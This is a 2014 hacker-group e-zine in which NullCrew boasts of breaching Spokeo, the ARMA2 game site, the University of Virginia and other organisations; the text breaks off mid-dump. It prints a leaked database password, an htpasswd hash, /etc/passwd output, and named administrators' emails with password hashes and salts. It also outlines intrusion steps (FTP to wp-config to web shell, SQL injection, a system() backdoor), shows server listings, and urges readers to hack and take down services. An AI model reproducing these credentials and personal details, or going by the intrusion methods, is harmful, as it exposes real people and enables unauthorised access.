███████████████████████████████████████████████████████████████████████████████████████████████████████
█ Fuck feds, fuck police, fuck the government and most of all... █
█ █
█ ` ``````.` .`..``` `` █
█ ███ ```.`.`...-``.--.--:-/:/--:--:` ██ █ 2012 (X)█
█ █ `.---:----.`.``.`.``...`---::-----/+::` █ █ █ 2013 (X)█
█ ███ `:...---/---.``````` ` `` ` `....-.-..-..---:. █ ██ 2014 (X)█
█ █ .-//--...`.-.`.``` ``` ```````` ``..`--.--` █
█ .-`.----..`.`.`` ` ` ` `` ```-:--.... █ █ Issue #5 █
█ █ █ `//::-`..:-..` ` `` `` `.`..-.`:` █ █ █
█ █ █ /o///:...:-.`` ` ` ``` ``..```-- █████ 4 █
█ ███ ds+/--:--.... ` `` ` ``` `...-`.- 2 █
█ omy+:--::/:`````` ` ``.-:-..: █ 0 █
█ ███ Ndy+:--`.-..`` .---`-. █ █
█ █ .dsh+-::--/--.` ....`.` █ e █
█ ███ omhs-:-:-:-..` ` ``.`-`` █████ d █
█ `mdmo/s+-/:::. `.-`.:`` i █
█ █ █ .MNN+oho+o/++.`` `...::: █ t █
█ ██ -Ndmssyo://+/... ` ` ```.--o █ o █
█ █ █ -MMhy:/:--+://-.` ` ` ````` `.`.-/d` █ n █
█ █ █ MNNmys:-:/:++--` ` `````` ` `````..-/d` █████ █
█ .NMMNsy:-.///s:/-.``` ` `` ``.- .-:-+h` █
█ `NMMMds+-/.--:---.`` ` ` `.. ` `````::-:+h` █████ █
█ █████ oMMMMMms+//+oo-::.``...```` `````..--.` ` ```.````..:o/+sos █ █
█ █ `dMMMMMdyo:-/+::---..-`-.``...``..::...`````` ```` ..-```..:/hyssy/ █ █
█ █ -NMMMMMMmddso+//o+-:--.-...`.:-.-:---..-`.`` ` .```` ...`--+shmNmdd █ █
█ █ -NMMMMMMNNMNddhhmdyo+:/::-..-.-----:-:-..---........`.-..:++ymMNNmM: █████ █
█ █ █ mmNmddhhhdhyhmdNNNmdyhy:..--/:-.-:s+-::--/::++yso+/ooshhmNNMNmNMs █
█ █████ +hNMMMMMMMMNNmmdmdhhdNmdso//:o:::+oyyyosdmddddddhhdmNmmNMNNNdmm+ ████ █
█ █ █ ooNMMMMMMMMMMMNMMMMNhsNmhy+/+++ohshNNNdyhyydNMMMMMMMMMMMMMMMm: █ █ █
█ +yNMMMMMMMMMNo/yMMMMMdhhso+o/+++ydMhydMMMMMNhhMMMMMMMMMMMNm. ███ █
█ █████ /shoMMMMMMMMNMN+mMMMMMNy/://:-:-/dodMNMMMd:+yNMMMMMMMMMN+s` █ █ █
█ █ -yhdshMMMMMMMMMMMmMMMMNs/--.:.`-.+hNMMMNNhdMMMMMMMMMMNs/s` █ █ █
█ █████ os/hhoymMMMMMMMMNNMMMN:..--.-.``-mMMMMMMMMMMMMMMMMhoos/+ █
█ █ `h+-:+sosshdNMMMNMMMd/..---..-.` /dMMMMMMMMMMMNhoosy:-+. █████ █
█ █████ .do-.``+++//:////:.``-.--.``..-..`/shddmdhyyoosso```+- █ █
█ .sh/.` ``..``...----...--:.---..::+/+//--````-+- █ █
█ +ms/-`` ``.---.-...---`.-::.-.-.````` ` .-+s/` █████ █
█ ████ oyh+:.` ` `......-:-:...-:o/.`.`````.`-:osdy. █ █
█ █ █ /ys/:.` `````.`--os-`:o+.-. ` `..-/+sddh:` █ █
█ █ `os+..```` `..`-...`````````.--/oyhdo-` █████ █
█ ████ -yo:-..```..```.`` ....-:+oddmy- █
█ █ y/.-.```.-::-:-:.-/+::/shydy/ ` ` █ █ █
█ █ █ `/o:..```..`` .`.`.::-+hdh- `..`.`. █ █ █
█ ████ ` y/.` ```` ` ```.-/dNy ... █ █ █
█ oMMNh+:.` `` `.:ohmmmd` █ █ █ █
█ █ █ . ymNNMNmmdhhdhmNNmmmmyo- █ █ █ █ █
█ █ █ ` ..:::::/:/+:/:-``.` █ █ █
█ ██ `` █
█ █ █
█ █ █
█ █
█ ████ █
█ █ █ █
█ █ █
█ ████ █
█ █ █
█ █ █ █
█ ████ █
█ █
█ █████ █
█ █ NullCrew. (Zer0Pwn, rootcrysis, Siph0n.): █
█ █ This is a 4/20 zine, how ya gonna read it with no weed? █
█ █ FIRE UP!! █
█ █
█ █████ Music for this zine! █
█ █ █
█ █████ Just tell them now they better hit the ground, all you hear is hostage down! █
█ █ Whether Office, Dust, Aztec, or Lounge? All I hear is hostage down! █
█ █ So the terrorists getting the message now? All I hear is, hostage down! █
█ █████ █
█ █
█ █ █ █
█ █ █ █ █ █
█ █ █ █ █
█ █ █ █
█ █
███████████████████████████████████████████████████████████████████████████████████████████████████████
█ █
█ TABLE OF CONTENT █
█ █
█████████████████████████████████████████████████████████████████████████████
█ █
█ sPOKEO: █
█ ARMA2: █
█ VIRGINIA.EDU: █
█ Klas Telecom: █
█ in.gov (Zimbra.): █
█ Telco Systems: █
█ National Credit union: █
█ Science and Technology center (stcu.int) █
█ International Civil Aviation Organization(icao.int) █
█████████████████████████████████████████████████████████
█████ █████ █████ ███ ████ ███████ █ █ ██████ ███████ ███████ ████ █████ █
█ █ █ █ █ █ █ █ █ ███ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ ██ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
█████ █ █ █ █ ████ ████████ ████ ██████ █ ███████ ████ █ █ █
Once upon a time, in 2012; A group of electronic brotherhood was born within the shadows of the legendery deep-web.
This group excelled throughout time gaining noterity, eventually gaining a strong stature in the hacker-community.. Well.
Imagine this, a year in and this group goes silent.. they lurk in the shadows.
Oh no! The group, they must have gotten v&! What-ever shall we do!? The many people wonder.
Whelp, folks, we're here with some good information for you! #FuckTheSystem continues on!
We would like to point out a few things about this e-zine ahead of time, before you go on the view the contents.
This zine is titled #FuckTheSystem for a reason, and that reason is because the system is corrupt.
So, for #FuckTheSystem we've decided to own and destroy several things belonging to something in the system.
We're not your average super-heros of the internet; but we do dispense lulz at a heavy ammount when needed.
#FuckTheSystem is generally aimed at the government, or anything that is corrupt; and that is the reason for these attacks.
Ranging from government contractors, to universities, to telecommunications compaines, to information databases, and other things.
They are all part of the system; and have failed examinations the first time arround; some of the attack methods may have been simple.. or the data not to complex.
But, it can still lead to things that they do not want; and it also costs them, therefore we have commited actual damage to this certain aspect of the system. In a way, we achieve our goal.
Anyone can #FuckTheSystem, not just us; You don't have to be an hacktivist, you just need to be an activist.
You must have a voice that you want to be heard, and you can make that voice heard; We do it in this way, and it is effective.
Anything works: Pictures, videos, graffiti, removal of survices, and of course.. hacking. There are many other things, you can figure it out.
Ah, bahumbug, I think we've went on a bit to long about this; let's get on to the zine! - NullCrew
P.S: There will be a download link at the end of the e-zine, just so you can download all of the data we took and mentioned, have fun.
rootcrysis Zer0Pwn Siph0n
^ ^ ^
.-"""-. \_/ \_/ \_/
/ \ / \ / \ ) ( WE'VE LANDED MOTHERFUCKERS!
.--'._____.'--. \"/ \"/ \"/
( o _ o ) /|\__, __/|\ /|\
'-..o_|_|_o..-' \| ` | \ / | \
/ \ ` |\ |\ ` ` /| `
() () | \ / | __/ |
| / / | ` |
` ` ` ` `
██ █ █████
█ █ ███ █████ ████ █ █ █ █████
█ █ █ █ █ █ █ █ █ █ █ █
█ █ █ █ █ █ ██ █████ █ █
█████ █ ███ █████ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █
████ █ ████ █ █ █████ █████
Alright, let's begin this story of rampage against Spokeo's administrators and web-developers.
Now, I know you all are going to find this method laughable; However.. Spokeo had:
1) A web-developer with FTP open on their private server.
2) The web-developers server maintained a constantly updated copy of spokeo.com/blog's wp-config.php file
So, this was literally pretty fucking easy for us; Spokeo's web-developers private server maintained that, with FTP open..
Whelp, knowing this? We decided to plug ourselves into that FTP, grab a copy of wp-config.php (For the private server.)
And then practically just log into wordpress as administrator, shell; and had some fun collecting what we could before spokeo caught on.
So, spokeo, what is it that we have learned today? Your administrators are more unsecure then your wifes vag to us..
*Spokeo.com
Uname:
User:
Php:
Hdd:
Cwd: Linux ip-10-249-65-47 3.4.73-64.112.amzn1.x86_64 #1 SMP Tue Dec 10 01:50:05 UTC 2013 x86_64 [exploit-db.com]
48 ( apache ) Group: 48 ( ? )
5.3.28 Safe mode: OFF [ phpinfo ] Datetime: 2014-01-21 09:22:18
7.87 GB Free: 1.46 GB (18%)
/var/www/ drwxr-xr-x [ home ]
Name Size Modify Owner/Group Permissions Actions
[ . ] dir 2014-01-16 23:56:56 0/0 drwxr-xr-x R T
[ .. ] dir 2014-01-17 22:20:04 0/0 drwxr-xr-x R T
[ blog-old ] dir 2014-01-16 03:07:42 48/48 drwxr-xr-x R T
[ cgi-bin ] dir 2013-12-10 00:29:49 0/0 drwxr-xr-x R T
[ error ] dir 2014-01-07 17:43:04 0/0 drwxr-xr-x R T
[ fixed ] dir 2014-01-16 23:43:54 0/0 drwxr-xr-x R T
[ html ] dir 2014-01-16 03:21:31 0/0 drwxr-xr-x R T
[ icons ] dir 2014-01-07 17:43:10 0/0 drwxr-xr-x R T
[ src ] dir 2013-12-06 00:59:16 48/48 drwxr-xr-x R T
.htaccess 141 B 2014-01-08 19:17:23 0/0 -rw-r--r-- R T E D
blog 45 B 2014-01-16 23:57:47 0/0 -rw-r--r-- R T E D
Okay, so, we checked the blog out; right? Like we said above. The administrator in this server kept a constantly updated version of wp-config.
So, let's get to that:
(Blog)
spokeo:$apr1$8HLyBy87$tDdtmCWPxlWbS0fugaiEQ1
WP-Config:
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'abra30hp');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Okay, so, no; we didn't get root; but, here you go:
: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
ec2-user:x:222:500:EC2 Default User:/home/ec2-user:/bin/bash
saslauth:x:221:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
Don't think that's all, because it's not; In the download at the end of the zine is one of spokeos sql dbs, have fun! .
And also, as proof that we did indeed achieve this; at the time of the exploit, we defaced their blog's index.
Mirror: http://zone-h.com/mirror/id/21609991
███
███ █ ███ █████ █ █ ███ █ █
█ █ █ █ █ █ █ █ █ █ █ █ █
█ █████ ████ █ █ █ █████ ██
██ █ █ █ █ █ █ █ █ █
█ ████
████ █
On to the next one, which is ARMA2; Now, what is ARMA?
Arma is a video-game that military occupants use to gain knowledge.
Arma sadly didn't have much interesting in it; Aside from a SQL Injection vulnerability that we exploited.
What we were able to grab, instead; were administrator passwords belonging to ARMA2's website.
Amongst a few other things, of course.
██████████████████████████████████████████████
█S3RV3R INF0RMATI0N: █
█web application technology:PHP 5.4.12, Nginx█
█3XPL0IT ALLOWED BY: JOOMLA █
█DBMS:MySQL 5.0 █
██████████████████████████████████████████████
email, username, usertype, password
alexander.harlander@petergames.de:Morphicon:Editor:8882efcade928d9ee7c9a5663d102c4b:pMsFohI8s2Ybcf9ELDAQNX617oH1sgbE
carey.james@gmail.com:JCarey:Editor:d98af715e64f5ad934885d0f3c7670d8:wReCiDAkQrGlVpymplRYGLAQU573Neme
dan@altargames.com:dmusil:Manager:32c3dacb5ccb11d17e78b0213f3bc9ec:eKzhfALEnYbYilxh1ooHeZeZ550is45R
dave@altargames.com dave:Author:f89764e4af4f12da89f22249b75a4c46:gAFUDZoAt33SjXQ9opHK8EzLywnwrY2g
dwarden@bistudio.com:Dwarden:Manager:e81d60b356e51801f4953becce7ff38f:bMsIEoaKrDARcN9GCtvS8sqvejg9FMY2
hlavac@bistudio.com:hlavac:Super Administrator:9492ac0bfdb364155b011bdd131e2803:dUyNEubxcDLMh30ol8tsadMaOLdQjQLm
ivan@bistudio.com:Ivan:Manager:1e45d443266ce93f9dea0cf55e891e2d:iT9ow9gjPCnenYPRrdGkcPRuyNwRK8v4
jan.prazak@bistudio.com:admin:Super Administrator:9fa68fda92746ea27e972e43e02436af:ChQ20HRqOmhKemU5aVnAUvuLY5i4vl2C
jay.crowe@gmail.com:jay:Administrator:b01de7f6edb9a46d9e15b2dbc0bb156b:TM5NyeccedXVrUJwQcDtnQXmugkZfVCk
jennik@vrtule.info:jennik:Manager:4c2d0769198ea6a133100021a0558c11:i2xTbLPXc0qedLJ5htl33jdqRsPhuUCT
jervant.malakjan@bistudio.com:Jervant:Super Administrator:036252be62b5fae2c244e989ed32f485:vC8RkTdOMA4U9YMKmbqJ5XpjDGR1qmrJ
kunt@idea-games.com:kunt:Super Administrator:4020b9d55d6066fee53daf2f567e3cef:wWmNJsCNz8zbGw6pwQEiQw67ZZuyHXA3
lukas@bistudio.com:lukas:Manager:f773700d68e492721659877a0f3939a0:isVwTHFMRumLP7p2y1SBeYwTnXnvpNDQ
michal@idea-games.com:Harangozo:Manager:e5caaeaea2353d2c3995e069ad53a7b6:uSTumeJlyOE8gmwUdoQPN1S8cYN6Z6GB
pavel.medek@bistudio.com:meddy:Editor:db607e2a877084c764c790d764bdf3dd:HHd3GUnE93KQAs0uQ1LDePU6QkXKLsPW
pettka@altargames.com:Pettka:Administrator:df3aef513b8c1294e28cc39d8404a621:dqILH3a1pdI509xCrz6W9mI64FdgjY83
placebo@bistudio.com:placebo:Author:9f7062ccd0e20bd725e5e09d90f01c39:OQpUsc5G0XzcavaaMPNcRkk7RzM1iigN
spanel@bistudio.com:Maruk:Administrator:e722beab3a581d403138c5aa40094201:oLtJHdBw7xnSMo7Ab8cq8Nwkv9Mv0b9K
unicorn@altargames.com:ikkaku:Administrator:9b3c5af7720da3a7bf4880655e6a93cd:YDmqdNSR2eNKjQaoU78JL1bdM1mjMp9L
vasa@bistudio.com:vasa:Super Administrator:c301ce7a3d2fbf58acba2ebd69abf13b:baokGrB1Q1GdyQMRbL7JOMFpfVb84gol
wocko@email.com:wocko:Manager:c2c72869c0974cd86aea9b5b60280ab3:OwOzsiNR0vMRVeO1Ome8mj4XLsTyepV4
█ █ █ █ ███
███ █ █ █ █ █ █ █
█ █ █ █ █ █ █████
█ ████ █ █ █
█ █
███ █
UVA, Also known as the University Of Virginia; Or virginia.edu..
Let's start with security standards taken since the last break-in:
1) Disable word-press logins assuming that hackers have ONLY taken advantage of your out of date WP versions.
2) What, no number two? Why is that, NullCrew?
Funny that you ask, the University Of Virginia, we were able to spawn a system() backdoor and skim through your files.
It's also noticably laughable that the UVA IT Crew decides that everything is secure enough to host a good few other sites, with shared hosting.
Now, you can't have all the goodies.. BUT: We will give you enough to tide you over.
Oh, and UVA? Secure your shit, or get owned over and over and over again; several of your subdomains are exploitable.
Not to mention that where it's all shared, every website hosted by UVA?.. Whelp, root one, get them all.
uname -a AIX ws9-1 3 5 000458FAD300
ls /:
X11.5
audit
bin
bosinst.data
common
contrib
core
dev
etc
frame
gnu
h1
h2
home
image.data
itc
lib
lost+found
lpp
lv1
lv1new
lv2
man
mnt
mount.a237722
mount.t237722
na
net
opt
proc
rs6000
sbin
smit.log
smit.script
smit.transaction
tftpboot
tmp
u
unix
usr
uva
var
vfs.t237722
web
web.pri
web.sec
www
ls /web:
2012-13yir.artsandsciences.virginia.edu aaheritageva.org aahv.virginiafoundation.org accdb.bme.virginia.edu accs.virginia.edu acrossthefootbridge.com acrossthefootbridge.org adh.art.virginia.edu advance.virginia.edu aix-web-cluster-1.itc.virginia.edu albemarleemergency.com albemarleemergency.org alumnitravel.virginia.edu amalgam.virginia.edu americanpoliticaldevelopment.org americanpresident.org amp.sys.virginia.edu appreciativeinquiry.virginia.edu approject.org artsandsciences.virginia.edu artsboxoffice.virginia.edu ashaforeducation.orgs.virginia.edu backstory.vfhblogs.org backstory2013.vfhblogs.org backstoryradio.net backstoryradio.org behaviorprogress.org behaviorprogress.virginia.edu bioethics.virginia.edu biomath.virginia.edu blackunionsoldiers.org blog.bioinformatics.virginia.edu blog.cvrc.virginia.edu blog.encyclopediavirginia.org blog.innovation.virginia.edu bme.virginia.edu board.vfhblogs.org board.virginiafoundation.org bohr.ms.virginia.edu bookartspress.com bookartspress.net bookartspress.org bsuva-epubs.org bsuva.org buildingbetterteachers.org campaign.artsandsciences.virginia.edu campaign.virginia.edu ce.virginia.edu cee.virginia.edu centerforpolitics.org central.itc.virginia.edu cgep.virginia.edu charlottesvilleemergency.com charlottesvilleemergency.org climate.virginia.edu collegehealthsurveillancenetwork.org communityemergency.com communityemergency.org coopercenter.org cpe.virginia.edu creativewriting.virginia.edu cts.virginia.edu curry.edschool.virginia.edu curry.virginia.edu curryschool.net curryschool.org cvrc.virginia.edu cvwp.net cvwp.org darden.virginia.edu data.bioinformatics.virginia.edu dc.vfhblogs.org demographics.coopercenter.org dept.biology.virginia.edu dev.artsandsciences.virginia.edu dev.ce.virginia.edu dev.centerforpolitics.org dev.coopercenter.org dev.curry.virginia.edu dev.cvrc.virginia.edu dev.hereford.virginia.edu dev.mae.virginia.edu dev.math.virginia.edu dev.mlbs.virginia.edu dev.mobile.virginia.edu dev.rarebookschool.org digitalstoryteller.org discoveringcurry.com dnaseq.med.virginia.edu docscompass.virginiafoundation.org documentscompass.org dscourse.org ecomod.virginia.edu edui.vfhblogs.org edui2009.vfhblogs.org edui2011.vfhblogs.org edui2012.vfhblogs.org eduiconf.org ee2.hr.virginia.edu engl.virginia.edu essaysinhistory.com essaysinhistory.net essaysinhistory.org etc ev.vfhblogs.org expandingcollegeopps.org faculty.virginia.edu files-with-low-gid folklife.vfhblogs.org folklifefieldnotes.org folklifefieldnotes.vfhblogs.org frog.edschool.virginia.edu genesis2.virginia.edu genesisII.virginia.edu genesisii.virginia.edu globalhealth.cgh.virginia.edu goodpolitics.net goodpolitics.org graduate.engl.virginia.edu gwpapers.virginia.edu harvardprincetonuva.com hereford.virginia.edu hfb.vfhblogs.org history.virginia.edu homedir.virginia.edu hoosonline.virginia.edu hoovision.athletic.virginia.edu hr.virginia.edu iasc-culture.org iath.virginia.edu ien.arch.virginia.edu im.dev.virginia.edu indorgs.virginia.edu infotech.seas.virginia.edu iris.virginia.edu isweb jefferson.village.virginia.edu kcci.virginia.edu kinzie.edschool.virginia.edu kluge-ruhe.org krs.clas.virginia.edu lib.law.virginia.edu linux-web-cluster-2.itc.virginia.edu linux-web-cluster-3.itc.virginia.edu livedtheology.org louisiananativeguard.org ltap.cts.virginia.edu m.vabook.org macarthur.virginia.edu marriagematters.virginia.edu math.virginia.edu medicine.virginia.edu midatlantic-terascale.org millercenter.virginia.edu mlbs.org mlbs.virginia.edu mlp.virginia.edu mobile.virginia.edu modernpoetry.engl.virginia.edu morphogenesis.virginia.edu mrsec.virginia.edu msdnaa.virginia.edu mydcav.org mylabpartner.org myuva.virginia.edu nationalsocialnorm.com nationalsocialnorm.org nationalsocialnorminstitute.com nationalsocialnorminstitute.org nationalsocialnorms.com nationalsocialnorms.org nationalsocialnormsinstitute.com nationalsocialnormsinstitute.org new.artsandsciences.virginia.edu new.hereford.virginia.edu new.trc.virginia.edu news.virginia.edu nrcgtuva.org ntlcoalition.org ntls.info officearchitect.virginia.edu old.backstoryradio.org old.engl.virginia.edu old.readmeridian.org old.uvacse.virginia.edu oldbooks.virginia.edu online.seas.virginia.edu onlinelearn.edschool.virginia.edu opengrounds.virginia.edu openportfolio.org organizationalexcellence.virginia.edu outs parallaxproject.org pdk.edschool.virginia.edu pharm.virginia.edu pi.math.virginia.edu pibeta.phys.virginia.edu podcast.virginia.edu poetryforge.org policog.politics.virginia.edu primaryaccess.org proxy.virginia.edu pva.med.virginia.edu raisetherank.com rarebookschool.com rarebookschool.net rarebookschool.org rbsconnect.org readingfirst.virginia.edu readingquest.org readmeridian.org recsports.virginia.edu redirect-test.vfhblogs.org rff.vfhblogs.org rff.virginiafolklife.org riggoryridge.org rodmanscholars.org romereborn.virginia.edu rotunda.virginia.edu rotunda_cam salsaclub.orgs.virginia.edu sciencescholars.clas.virginia.edu seas.virginia.edu sexualassault.virginia.edu share silenegenomics.biology.virginia.edu sis.virginia.edu site.virginia.edu smarttravellab.virginia.edu social.virginia.edu socialnorm.org socialnorminstitute.com socialnorminstitute.org socialnorms.org socialnormsinstitute.com socialnormsinstitute.org sophiarosenfeld.com southernmediafund.org special.edschool.virginia.edu staging.aaheritageva.org staging.hr.virginia.edu staging.rotunda.virginia.edu staging.virginia.edu state.virginia.edu storyweb.org studiorecover.virginia.edu studyabroad.virginia.edu sysbio.virginia.edu teach.virginia.edu teacherlink.org teis.virginia.edu tempo.virginia.edu test test.artsandsciences.virginia.edu test.che.virginia.edu test.iath.virginia.edu test.millercenter.virginia.edu test.rarebookschool.org test.romereborn.virginia.edu test.vfhblogs.org testhost.virginia.edu titus-group.med.virginia.edu tlp.seas.virginia.edu today.news.virginia.edu trc.virginia.edu tti.virginia.edu uva.healthfoundation.virginia.edu uva2go.net uva2go.org uvacatering.com uvacse.virginia.edu uvaemergency.com uvaemergency.org uvafallschurch.com uvafamilies.virginia.edu uvarichmond.com uvaspeechandhearing.org uvatibetcenter.org uvatogo.net uvatogo.org vabc.vfhblogs.org vabook.org vaindianprogram.com vaindianprogram.net vaindianprogram.org vfh.vfhblogs.org vfhblogs.org vfhevents.vfhblogs.org vfhevents.virginia.edu vfhradio.org vfhumanities.org vhosts.itc.virginia.edu vignettes.vfhblogs.org virginiabookarts.org virginiabookarts.vfhblogs.org virginiafolklife.org virginiafoundation.org virginiahumanities.org virginiaindianprogram.com virginiaindianprogram.net virginiaindianprogram.org virginiavignettes.org viseyes.org viva.ee.virginia.edu w wais wc.engl.virginia.edu web-clusters-monitor webtest.itc.virginia.edu wgr.vfhblogs.org whitehousetapes.org withgoodreasonradio.org womenscenter.virginia.edu ws0-2.itc.virginia.edu ws1-2.itc.virginia.edu ws10.itc.virginia.edu ws11.itc.virginia.edu ws12.itc.virginia.edu ws13.itc.virginia.edu ws16.itc.virginia.edu ws17.itc.virginia.edu ws2-2.itc.virginia.edu ws3-2.itc.virginia.edu ws4-2.itc.virginia.edu ws5-2.itc.virginia.edu ws6-2.itc.virginia.edu ws7-2.itc.virginia.edu ws8-2.itc.virginia.edu ws9-2.itc.virginia.edu www.aaheritageva.org www.aahv.virginiafoundation.org www.advance.virginia.edu www.albemarleemergency.com www.albemarleemergency.org www.alumnitravel.virginia.edu www.amalgam.virginia.edu www.americanpoliticaldevelopment.org www.americanpresident.org www.appreciativeinquiry.virginia.edu www.approject.org www.artsandsciences.virginia.edu www.artsboxoffice.virginia.edu www.backstory.vfhblogs.org www.backstory2013.vfhblogs.org www.backstoryradio.net www.backstoryradio.org www.behaviorprogress.org www.bioethics.virginia.edu www.biomath.virginia.edu www.blackunionsoldiers.org www.bme.virginia.edu www.board.vfhblogs.org www.board.virginiafoundation.org www.bookartspress.com www.bookartspress.net www.bookartspress.org www.bsuva-epubs.org www.bsuva.org www.buildingbetterteachers.org www.campaign.artsandsciences.virginia.edu www.campaign.virginia.edu www.cci.virginia.edu www.ce.virginia.edu www.cee.virginia.edu www.centerforpolitics.org www.cgep.virginia.edu www.charlottesvilleemergency.com www.charlottesvilleemergency.org www.che.virginia.edu www.climate.virginia.edu www.collegehealthsurveillancenetwork.org www.communityemergency.com www.communityemergency.org www.coopercenter.org www.cpe.virginia.edu www.creativewriting.virginia.edu www.cts.virginia.edu www.curry.virginia.edu www.cvwp.net www.cvwp.org www.darden.virginia.edu www.dc.vfhblogs.org www.digitalstoryteller.org www.discoveringcurry.com www.documentscompass.org www.dscourse.org www.ecomod.virginia.edu www.edui.vfhblogs.org www.edui2009.vfhblogs.org www.edui2011.vfhblogs.org www.edui2012.vfhblogs.org www.eduiconf.org www.essaysinhistory.com www.essaysinhistory.net www.essaysinhistory.org www.ev.vfhblogs.org www.expandingcollegeopps.org www.faculty.virginia.edu www.folklife.vfhblogs.org www.folklifefieldnotes.org www.folklifefieldnotes.vfhblogs.org www.genesis2.virginia.edu www.genesisII.virginia.edu www.genesisii.virginia.edu www.goodpolitics.net www.goodpolitics.org www.gwpapers.virginia.edu www.harvardprincetonuva.com www.hereford.virginia.edu www.hfb.vfhblogs.org www.homedir.virginia.edu www.hoosonline.virginia.edu www.hr.virginia.edu www.iasc-culture.org www.iath.virginia.edu www.indorgs.virginia.edu www.jilluva.org www.kcci.virginia.edu www.kluge-ruhe.org www.livedtheology.org www.louisiananativeguard.org www.m.vabook.org www.macarthur.virginia.edu www.mae.virginia.edu www.marriagematters.virginia.edu www.math.virginia.edu www.medicine.virginia.edu www.midatlantic-terascale.org www.millercenter.virginia.edu www.mlbs.org www.mlbs.virginia.edu www.mlp.virginia.edu www.mobile.virginia.edu www.morphogenesis.virginia.edu www.mrsec.virginia.edu www.mydcav.org www.mylabpartner.org www.myuva.virginia.edu www.nationalsocialnorm.com www.nationalsocialnorm.org www.nationalsocialnorminstitute.com www.nationalsocialnorminstitute.org www.nationalsocialnorms.com www.nationalsocialnorms.org www.nationalsocialnormsinstitute.com www.nationalsocialnormsinstitute.org www.ntlcoalition.org www.ntls.info www.officearchitect.virginia.edu www.opengrounds.virginia.edu www.openportfolio.org www.organizationalexcellence.virginia.edu www.parallaxproject.org www.pharm.virginia.edu www.poetryforge.org www.primaryaccess.org www.publicaffairs.virginia.edu www.raisetherank.com www.rarebookschool.com www.rarebookschool.net www.rarebookschool.org www.rbsconnect.org www.readingfirst.virginia.edu www.readingquest.org www.readmeridian.org www.recsports.virginia.edu www.redirect-test.vfhblogs.org www.rff.vfhblogs.org www.riggoryridge.org www.rodmanscholars.org www.romereborn.virginia.edu www.rotunda.virginia.edu www.seas.virginia.edu www.sexualassault.virginia.edu www.sis.virginia.edu www.social.virginia.edu www.socialnorm.org www.socialnorminstitute.com www.socialnorminstitute.org www.socialnorms.org www.socialnormsinstitute.com www.socialnormsinstitute.org www.sophiarosenfeld.com www.southernmediafund.org www.staging.virginia.edu www.storyweb.org www.studiorecover.virginia.edu www.studyabroad.virginia.edu www.sysbio.virginia.edu www.teach.virginia.edu www.teacherlink.org www.tempo.virginia.edu www.test.vfhblogs.org www.trc.virginia.edu www.tti.virginia.edu www.upress.virginia.edu www.uva.edu www.uva2go.net www.uva2go.org www.uvacatering.com www.uvacse.virginia.edu www.uvaemergency.com www.uvaemergency.org www.uvafallschurch.com www.uvafamilies.virginia.edu www.uvarichmond.com www.uvaspeechandhearing.org www.uvatibetcenter.org www.uvatogo.net www.uvatogo.org www.vabc.vfhblogs.org www.vabook.org www.vaindianprogram.com www.vaindianprogram.net www.vaindianprogram.org www.vfh.vfhblogs.org www.vfhblogs.org www.vfhradio.org www.vfhumanities.org www.vignettes.vfhblogs.org www.virginia.edu www.virginiabookarts.org www.virginiabookarts.vfhblogs.org www.virginiafolklife.org www.virginiafoundation.org www.virginiahumanities.org www.virginiaindianprogram.com www.virginiaindianprogram.net www.virginiaindianprogram.org www.virginiavignettes.org www.viseyes.org www.wc.engl.virginia.edu www.wgr.vfhblogs.org www.whitehousetapes.org www.withgoodreasonradio.org www.womenscenter.virginia.edu www.xcg.virginia.edu www.ywlp-old.virginia.edu www.ywlp.virginia.edu wwwtest.virginia.edu xcg.virginia.edu youthviolence.edschool.virginia.edu ywlp-old.virginia.edu ywlp.edschool.virginia.edu ywlp.virginia.edu ywlp.womenscenter.virginia.edu ywlp.womenscenter.virginia.edu
cat /tmp*:
/tmp data:
*VC 5.0 *TM IBM,9115-505 *SE IBM,0306458FA *PI 000458FA *N5 911506-458FA 52A607-60092838298151351DB5510728700020041B5000200 00 0 555500000040AD 00000000 0000 *OS AIX 5.3.0.0 *FC ******** *DS System VPD *YL U9115.505.06458FA *RT VSYS *FG XXSV *BR P0 *SE 06458FA *TM 9115-505 *SU 0004AC1212AD *VK ipzSeries *FC ******** *DS CEC *YL U789F.001.AAA8848 *RT VCEN *FG XXEV *BR P0 *SE AAA8848 *TM 789F-001 *CI 9115-505 06458FA *RK 0000000000000000 *FC 789F-001 *VK ipzSeries *FC ******** *DS SYSTEM BACKPLANE *YL U789F.001.AAA8848-P1 *RT VINI *FG XXBP *CC 53B3 *SN YL10W8224009 *FN 10N6781 *PN 32N1339 *PR 2300000000000000 *HE 0001 *CT 40130202 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *VK ipzSeries *FC ******** *DS ANCHOR *YL U789F.001.AAA8848-P1-C1 *RT VINI *FG XXAV *CC 52A6 *SN YL1076009283 *FN 03N5086 *PN 03N5086 *PR 8100180000000000 *HE 0010 *CT 40B40000 *HW 0001 *B3 000000000001 *B4 00 *B7 000000000000000000000000 *B9 